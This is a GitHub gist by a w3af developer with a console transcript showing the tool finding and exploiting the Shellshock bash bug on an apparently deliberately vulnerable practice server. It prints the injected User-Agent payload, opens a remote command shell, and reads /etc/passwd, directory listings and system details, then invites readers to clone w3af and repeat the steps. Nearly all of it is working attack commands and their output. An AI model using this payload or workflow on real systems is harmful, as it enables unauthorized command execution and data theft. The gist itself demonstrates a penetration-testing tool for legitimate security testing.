Skip to content

Instantly share code, notes, and snippets.

@andresriancho
Last active August 29, 2015 14:06
Show Gist options
  • Save andresriancho/1a259f01312c0c5ddd1e to your computer and use it in GitHub Desktop.
Save andresriancho/1a259f01312c0c5ddd1e to your computer and use it in GitHub Desktop.
w3af can now exploit shell shock!
w3af>>> plugins
w3af/plugins>>> audit shell_shock
w3af/plugins>>> back
w3af>>> target
w3af/config:target>>> set target http://shellshock.notsosecure.com/cgi-bin/status
w3af/config:target>>> back
The configuration has been saved.
w3af>>> start
Shell shock was found at: "http://shellshock.notsosecure.com/cgi-bin/status", using HTTP method GET.
The modified header was: "User-Agent" and it's value was: "() { :;}; echo "shellshock: check"".
This vulnerability was found in the request with id 33.
Scan finished in 8 seconds.
Stopping the core...
w3af>>> exploit
w3af/exploit>>> exploit os_commanding
os_commanding exploit plugin is starting.
Vulnerability successfully exploited.
Generated shell object <os_commanding object (ruser: "pentesterlab" |
rsystem: "Linux vulnerable 3.14.1-pentesterlab")>
Vulnerability successfully exploited. This is a list of available shells and proxies:
- [0] <os_commanding object (ruser: "pentesterlab" | rsystem: "Linux vulnerable 3.14.1-pentesterlab")>
Please use the interact command to interact with the shell objects.
w3af/exploit>>> interact 0
Execute "exit" to get out of the remote shell.
Commands typed in this menu will be run through the os_commanding shell.
w3af/exploit/os_commanding-0>>> e cat /etc/passwd
root:x:0:0:root:/root:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/false
tc:x:1001:50:Linux User,,,:/home/tc:/bin/sh
pentesterlab:x:1000:50:Linux User,,,:/home/pentesterlab:/bin/sh
w3af/exploit/os_commanding-0>>> e ls -la /
total 4
drwxr-xr-x 18 tc staff 400 Sep 25 12:05 .
drwxr-xr-x 18 tc staff 400 Sep 25 12:05 ..
drwxr-xr-x 2 root root 1500 Sep 25 12:05 bin
drwxr-xr-x 2 root root 60 Sep 25 12:05 boot
drwxrwxr-x 14 root staff 4360 Sep 25 12:05 dev
drwxr-xr-x 10 root root 800 Sep 25 14:42 etc
drwxrwxr-x 3 root staff 60 Sep 25 12:05 home
-rwxr-xr-x 1 root root 496 Sep 25 09:57 init
drwxr-xr-x 5 root root 860 Sep 25 12:05 lib
lrwxrwxrwx 1 root root 11 Sep 25 12:05 linuxrc -> bin/busybox
drwxr-xr-x 4 root root 80 Sep 25 12:05 mnt
drwxr-xr-x 2 root root 160 Sep 25 12:05 opt
dr-xr-xr-x 68 root root 0 Sep 25 12:05 proc
drwxrwxr-x 2 root staff 120 Sep 25 12:28 root
drwxrwxr-x 4 root staff 80 Sep 25 12:05 run
drwxr-xr-x 2 root root 1200 Sep 25 12:05 sbin
dr-xr-xr-x 12 root root 0 Sep 25 12:05 sys
drwxrwxrwt 4 root staff 140 Sep 25 12:54 tmp
drwxr-xr-x 8 root root 200 Sep 25 12:05 usr
drwxr-xr-x 9 root root 200 Sep 25 06:30 var
w3af/exploit/os_commanding-0>>> e whoami
pentesterlab
w3af/exploit/os_commanding-0>>> help
Available commands:
help Display this information
lsp List payloads
payload <payload> Execute "payload" and get the result
read <file> Read the remote server <file> and echo to this console
write <file> <content> Write <content> to the remote <file>
upload <local> <remote> Upload <local> file to <remote> location
execute <cmd>
exec <cmd>
e <cmd> Run <cmd> on the remote operating system
exit Exit this shell session
w3af/exploit/os_commanding-0>>> lsp
apache_config_directory
apache_config_files
apache_htaccess
apache_mod_security
...
udp
uptime
users
users_config_files
w3af_agent
w3af/exploit/os_commanding-0>>> payload users
|----------------------------------------------------------------------------|
| User | Home directory | Shell | Description |
|----------------------------------------------------------------------------|
| nobody | /nonexistent/ | /bin/false | nobody |
| root | /root/ | /bin/sh | root |
| tc | /home/tc/ | /bin/sh | Linux User |
| lp | /var/spool/lpd/ | /bin/sh | lp |
| pentesterlab | /home/pentesterlab/ | /bin/sh | Linux User |
|----------------------------------------------------------------------------|
w3af/exploit/os_commanding-0>>> payload cpu_info
|-----------------------------------------------------------------------------|
| Description | Value |
|-----------------------------------------------------------------------------|
| cpu_info | AMD Opteron(TM) Processor 6272 |
| cpu_cores | 1 |
|-----------------------------------------------------------------------------|
w3af/exploit/os_commanding-0>>> payload uptime
|----------------------------------------------------------------------------|
| Description | Hours | Minutes | Seconds |
|----------------------------------------------------------------------------|
| idletime | 25 | 16 | 54 |
| uptime | 25 | 17 | 37 |
|----------------------------------------------------------------------------|
w3af/exploit/os_commanding-0>>>
@andresriancho
Copy link
Author

Exploitation is really cool since it doesn't require any third-party host to create a reverse shell, receive the result, etc. nor requires any staging payload: it's all done in one HTTP request/response loop.

The shell-shock exploit source code is available here and as you'll be able to see it fits right into our framework.

Try it yourself!

git clone https://github.com/andresriancho/w3af.git
cd w3af
git checkout develop
./w3af_console

And then type the commands above.

@andresriancho
Copy link
Author

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment